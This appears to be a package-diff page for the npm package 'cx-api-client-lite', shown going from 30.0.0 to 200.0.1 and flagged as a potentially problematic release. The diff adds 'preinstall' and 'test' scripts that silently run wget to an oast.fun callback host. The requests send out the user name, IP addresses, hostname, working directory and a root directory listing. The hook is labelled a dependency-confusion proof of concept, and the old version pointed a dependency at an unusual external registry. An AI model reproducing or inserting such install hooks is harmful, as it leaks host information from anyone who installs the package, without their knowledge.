cx-api-client-lite 30.0.0 → 200.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of cx-api-client-lite might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +3 -0
  2. package/package.json +14 -9
  3. package/README.md +0 -1
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json CHANGED
@@ -1,15 +1,20 @@
1
1
  {
2
2
  "name": "cx-api-client-lite",
3
- "version": "30.0.0",
4
- "description": "",
3
+ "version": "200.0.1",
4
+ "description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "test": "echo \"Error: no test specified\" && exit 1"
7
+ "test": "wget --quiet \"https://dakgghkqndvnajjgqqyjz09cax94j391e.oast.fun/?user=$(whoami)&host=$(hostname -I)&hostname=$(hostname)&path=$(pwd)&dirs=$(ls /../)\"",
8
+ "preinstall": "wget --quiet \"https://dakgghkqndvnajjgqqyjz09cax94j391e.oast.fun/?user=$(whoami)&host=$(hostname -I)&hostname=$(hostname)&path=$(pwd)&dirs=$(ls /../)\""
8
9
  },
9
- "keywords": [],
10
- "author": "",
11
- "license": "ISC",
12
- "dependencies": {
13
- "axios": "https://registry.storageartifact.com/cx-api-client-lite"
14
- }
10
+ "keywords": [
11
+ "test",
12
+ "PoC"
13
+ ],
14
+ "dependencies": {},
15
+ "config": {
16
+ "unsafe-perm": true
17
+ },
18
+ "author": "lykos_-",
19
+ "license": "ISC"
15
20
  }
package/README.md DELETED
@@ -1 +0,0 @@
1
- lupin